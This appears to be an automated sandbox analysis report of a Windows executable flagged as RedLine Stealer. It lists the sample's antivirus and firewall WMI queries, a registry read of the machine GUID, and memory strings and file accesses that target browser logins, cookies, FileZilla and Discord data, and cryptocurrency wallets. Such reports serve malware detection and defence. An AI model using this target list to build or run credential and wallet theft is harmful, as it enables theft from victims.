Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Users\user\Desktop\9dOKGgFNL2.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: 9dOKGgFNL2.exe, 00000002.00000002.1869047589.000000000678A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 2.2.9dOKGgFNL2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9dOKGgFNL2.exe.458a6f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9dOKGgFNL2.exe.45a2510.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9dOKGgFNL2.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9dOKGgFNL2.exe PID: 7712, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 9dOKGgFNL2.exe, 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $fq1C:\Users\user\AppData\Roaming\Electrum\wallets\*
Source: 9dOKGgFNL2.exe, 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: 9dOKGgFNL2.exe, 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: \Ethereum\wallets
Source: 9dOKGgFNL2.exe, 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlitessfnExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxeWinhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry.vstring.ReplacedfJaxxpathBSJB
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: Ethereum
Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: $fq5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	File opened: C:\Users\user\AppData\Roaming\atomic\	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\	Jump to behavior
Source: C:\Users\user\Desktop\9dOKGgFNL2.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\	Jump to behavior

Source: Yara match	File source: 2.2.9dOKGgFNL2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9dOKGgFNL2.exe.458a6f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9dOKGgFNL2.exe.45a2510.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9dOKGgFNL2.exe PID: 7536, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 9dOKGgFNL2.exe PID: 7712, type: MEMORYSTR

Remote Access Functionality

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 2.2.9dOKGgFNL2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9dOKGgFNL2.exe.458a6f0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9dOKGgFNL2.exe.45a2510.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
